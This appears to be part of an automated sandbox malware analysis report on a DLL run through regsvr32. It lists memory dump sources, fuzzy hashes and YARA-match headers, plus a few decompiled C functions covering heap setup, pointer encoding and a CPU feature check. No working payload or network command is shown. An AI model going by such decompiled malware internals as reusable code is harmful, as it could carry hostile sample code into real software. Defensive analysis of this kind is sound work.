                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: __
                                                                                            • API String ID: 0-2267946753
                                                                                            • Opcode ID: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
                                                                                            • Instruction ID: f828d04dc4844e21020736e096551d72127a7243d3577d4fee6bd43bdef74359
                                                                                            • Opcode Fuzzy Hash: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
                                                                                            • Instruction Fuzzy Hash: 9141E070508B848BE758DF29C18A41ABBF1FBC9304F500A2DF69A87361C775D845CB42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: GSn
                                                                                            • API String ID: 0-1733515909
                                                                                            • Opcode ID: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
                                                                                            • Instruction ID: 86e4d617eaf7a5da61f6f882766fb89a7c690a421d3d6cc135f1ca018dea51c6
                                                                                            • Opcode Fuzzy Hash: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
                                                                                            • Instruction Fuzzy Hash: 9951D6B090038E8FDF48DF64C84A5DE7BB1FB58358F104A1DEC66A6290D3B89664CF84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8=
                                                                                            • API String ID: 0-237953557
                                                                                            • Opcode ID: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
                                                                                            • Instruction ID: df96b3791e2c5c389720ad290d34c10c612a3b54f6fb3ca5a7f95a3900e45aaa
                                                                                            • Opcode Fuzzy Hash: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
                                                                                            • Instruction Fuzzy Hash: 75314930248B458BDB5CDF2CC49922ABAE1FBD9301F444A2EF58AD7365DB74D845CB82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: K
                                                                                            • API String ID: 0-425913083
                                                                                            • Opcode ID: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
                                                                                            • Instruction ID: 829fe707bd336df108158ff160501675fe01d40d14c3d92f3f38ec33e969cbe9
                                                                                            • Opcode Fuzzy Hash: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
                                                                                            • Instruction Fuzzy Hash: 6441F7B180438ECFDB48CF68D8864DE7BB0FB58344F114A19F866A6250D3B8D665CF85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: t"
                                                                                            • API String ID: 0-2131657386
                                                                                            • Opcode ID: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                            • Instruction ID: 995776e1f740c07cec4ae203234901a859b454b9e09a11e8fcbc90f6f40fe952
                                                                                            • Opcode Fuzzy Hash: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                            • Instruction Fuzzy Hash: 6B41D67190070DCBDF48DF64C48A0DE7FB0FB083A8F656219E81AB6290D3B89585CF99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            E0000000118000A878(long long __rax) {
                                                                                                signed int _t3;

                                                                                                _t3 = GetProcessHeap();
                                                                                                *0x800227e8 = __rax;
                                                                                                return _t3 & 0xffffff00 | __rax != 0x00000000;
                                                                                            }
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapProcess
                                                                                            • String ID:
                                                                                            • API String ID: 54951025-0
                                                                                            • Opcode ID: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                            • Instruction ID: b81358a64b4d4ed809fa94cc5bd0f3738e6ada5bf37cc3cf3ffb04c5a8196abe
                                                                                            • Opcode Fuzzy Hash: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                            • Instruction Fuzzy Hash: 44B09230E07A08C2EA8BAB516C8234423A8AB4C740FAA9058900C81330DE2C02ED5710
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                            • Instruction ID: 4672e6b0faf56747d45931516aa967294410a7dd16cb614359a76f8256564692
                                                                                            • Opcode Fuzzy Hash: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                            • Instruction Fuzzy Hash: E5E1F570E0460ACFDF58DFA8D49A9AFBBB2FB44348F004159D806E72A1D7789A15CBC5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                            • Instruction ID: fe6ea005f5639c675d9390aaae5e4b5dba9abc438d73e7c7ac0d2e524ff0cb5a
                                                                                            • Opcode Fuzzy Hash: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                            • Instruction Fuzzy Hash: AAC1CEB9903609CFDB68CF38C49A59D3BF1AF64308F604119EC269A2A6D774D529CB48
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                            • Instruction ID: 825b0e9917fd9aad1362f1dfaf5c504e65d1f67d6fe17b1a950adc5dd4fd1115
                                                                                            • Opcode Fuzzy Hash: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                            • Instruction Fuzzy Hash: ACB11771E04B489FDFA8DFA8D48A9DEBBF2FB44344F00451DE846A7290D7B8541ACB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                            • Instruction ID: a51721600db0622d8f0cbc348c4c120a5347a080f0533e7dd34b82db6b9d10ba
                                                                                            • Opcode Fuzzy Hash: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                            • Instruction Fuzzy Hash: 7FB1F6716087C88FDBBECF24C8892DB7BA9FB45708F504219E9CA8E254DB749744CB42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                            • Instruction ID: ee86ddf0d35a64364977b4e1ba27a9762a45e0bf81772b671d5e309e57e315d5
                                                                                            • Opcode Fuzzy Hash: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                            • Instruction Fuzzy Hash: 53814B70D08709EFDB58DFA8C49599EBBF1FB44344F40856EE849EB290DB749A09CB81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                            • Instruction ID: 83684f45fe9e977b774b6b642a06d97a4ff405ab719fd1c74209ec8d567ee4f0
                                                                                            • Opcode Fuzzy Hash: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                            • Instruction Fuzzy Hash: 4081077151074D9BDF88CF28C8C99DD7BB0FB583A8FA56218FC0AA6254D778D885CB84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                            • Instruction ID: 02b20daf93178a026e7f3d7b8144c0123b8c78d7e9ccfd4c8cf6a25771221141
                                                                                            • Opcode Fuzzy Hash: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                            • Instruction Fuzzy Hash: 4161217161464C8BEF28DF78D49A2AD3BE1FB44304F20613DEC669B2A2D778D906CB44
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                            • Instruction ID: d737fb992c4fb93ed735a2887ebe2c03482fa0fa15aff5e16beb0bf84d6cbed1
                                                                                            • Opcode Fuzzy Hash: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                            • Instruction Fuzzy Hash: 9671F870508789CBDBF9CF28D8896DE7BE4FB88704F20461DE9998B2A0DB749645CF41
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                            • Instruction ID: 322fdb5d9cbd24f261f2202f975b2bd3e56ab6ee9c72a1ae6d0c4d2aba79015f
                                                                                            • Opcode Fuzzy Hash: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                            • Instruction Fuzzy Hash: F8411561F66BD947FF43DA7A5812BB00A00AFA77C0E41E312FD0B77B52EB28455A8200
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                            • Instruction ID: 2bbe0064c7cc50be6dde76902d7839318a93b0d10f6361fc57af4654519b3f9f
                                                                                            • Opcode Fuzzy Hash: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                            • Instruction Fuzzy Hash: 7B51F770518788CBEBBADF34C8992D97BB0FB58304F90861DD84E8E290DB78574ACB41
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 56%
                                                                                            			E00000001180006818(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
                                                                                            				void* _t24;
                                                                                            				int _t26;
                                                                                            				signed int _t51;
                                                                                            				void* _t52;
                                                                                            				signed long long _t66;
                                                                                            				signed long long _t74;
                                                                                            				signed long long _t76;
                                                                                            				signed long long _t77;
                                                                                            				signed int* _t90;
                                                                                            				signed long long _t95;
                                                                                            				signed long long _t96;
                                                                                            				signed long long _t98;
                                                                                            				signed long long _t104;
                                                                                            				long long _t115;
                                                                                            				void* _t117;
                                                                                            				void* _t120;
                                                                                            				signed long long* _t123;
                                                                                            				signed long long _t124;
                                                                                            				signed long long _t126;
                                                                                            				signed long long _t129;
                                                                                            				signed long long*** _t132;
                                                                                            
                                                                                            				_t52 = __edi;
                                                                                            				_t51 = __edx;
                                                                                            				 *((long long*)(_t117 + 8)) = __rbx;
                                                                                            				 *((long long*)(_t117 + 0x10)) = _t115;
                                                                                            				 *((long long*)(_t117 + 0x18)) = __rsi;
                                                                                            				_t66 =  *((intOrPtr*)(__rcx));
                                                                                            				_t132 = __rcx;
                                                                                            				_t90 =  *_t66;
                                                                                            				if (_t90 == 0) goto 0x800069ac;
                                                                                            				_t124 =  *0x80021010; // 0x5e1a320b5ccd
                                                                                            				_t111 = _t124 ^  *_t90;
                                                                                            				asm("dec eax");
                                                                                            				_t74 = _t124 ^ _t90[4];
                                                                                            				asm("dec ecx");
                                                                                            				asm("dec eax");
                                                                                            				if ((_t124 ^ _t90[2]) != _t74) goto 0x8000691e;
                                                                                            				_t76 = _t74 - (_t124 ^  *_t90) >> 3;
                                                                                            				_t101 =  >  ? _t66 : _t76;
                                                                                            				_t6 = _t115 + 0x20; // 0x20
                                                                                            				_t102 = ( >  ? _t66 : _t76) + _t76;
                                                                                            				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76;
                                                                                            				if (( ==  ? _t66 : ( >  ? _t66 : _t76) + _t76) - _t76 < 0) goto 0x800068ba;
                                                                                            				_t7 = _t115 + 8; // 0x8
                                                                                            				r8d = _t7;
                                                                                            				E0000000118000A344(_t6, _t76, _t111,  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76, _t111, _t115, _t120);
                                                                                            				_t24 = E0000000118000878C(_t66, _t111);
                                                                                            				if (_t66 != 0) goto 0x800068e2;
                                                                                            				_t104 = _t76 + 4;
                                                                                            				r8d = 8;
                                                                                            				E0000000118000A344(_t24, _t76, _t111, _t104, _t111, _t115, _t120);
                                                                                            				_t129 = _t66;
                                                                                            				_t26 = E0000000118000878C(_t66, _t111);
                                                                                            				if (_t129 == 0) goto 0x800069ac;
                                                                                            				_t123 = _t129 + _t76 * 8;
                                                                                            				_t77 = _t129 + _t104 * 8;
                                                                                            				_t87 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
                                                                                            				_t64 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
                                                                                            				if (( >  ? _t115 : _t77 - _t123 + 7 >> 3) == 0) goto 0x8000691e;
                                                                                            				memset(_t52, _t26, 0 << 0);
                                                                                            				_t126 =  *0x80021010; // 0x5e1a320b5ccd
                                                                                            				r8d = 0x40;
                                                                                            				asm("dec eax");
                                                                                            				 *_t123 =  *(_t132[1]) ^ _t126;
                                                                                            				_t95 =  *0x80021010; // 0x5e1a320b5ccd
                                                                                            				asm("dec eax");
                                                                                            				 *( *( *_t132)) = _t129 ^ _t95;
                                                                                            				_t96 =  *0x80021010; // 0x5e1a320b5ccd
                                                                                            				asm("dec eax");
                                                                                            				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
                                                                                            				_t98 =  *0x80021010; // 0x5e1a320b5ccd
                                                                                            				r8d = r8d - (_t51 & 0x0000003f);
                                                                                            				asm("dec eax");
                                                                                            				( *( *_t132))[2] = _t77 ^ _t98;
                                                                                            				goto 0x800069af;
                                                                                            				return 0xffffffff;
                                                                                            			}

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 485612231-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 86%
                                                                                            			E000000011800070A0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
                                                                                            				intOrPtr _v12;
                                                                                            				intOrPtr _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				void* _t25;
                                                                                            
                                                                                            				_t25 = __r8;
                                                                                            				r8d = 0;
                                                                                            				 *0x800223a8 = r8d;
                                                                                            				_t1 = _t25 + 1; // 0x1
                                                                                            				r9d = _t1;
                                                                                            				asm("cpuid");
                                                                                            				_v16 = r9d;
                                                                                            				_v16 = 0;
                                                                                            				_v20 = __ebx;
                                                                                            				_v12 = __edx;
                                                                                            				if (0 != 0x18001000) goto 0x80007101;
                                                                                            				asm("xgetbv");
                                                                                            				_a8 = __rdx << 0x00000020 | __rax;
                                                                                            				r8d =  *0x800223a8; // 0x1
                                                                                            				r8d =  ==  ? r9d : r8d;
                                                                                            				 *0x800223a8 = r8d;
                                                                                            				 *0x800223ac = r8d;
                                                                                            				return 0;
                                                                                            			}

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                            • Instruction ID: 0b5ba2cec2f3816840067680c3456701fe7a71aa0eb5ae5909cae72e813b022f
                                                                                            • Opcode Fuzzy Hash: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                            • Instruction Fuzzy Hash: B2F062717142989EDBEACF6CA84275A77D0E30C3C0F90C029E6D983B04D63C82A48F44
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: GestureInfo$CloseHandle
                                                                                            • String ID: 8
                                                                                            • API String ID: 372500805-4194326291
                                                                                            • Opcode ID: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                            • Instruction ID: 9b1c06a3f3b833ac3e132f42adadd70dae9d03e82ad46587f4b990887cf4d8b3
                                                                                            • Opcode Fuzzy Hash: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
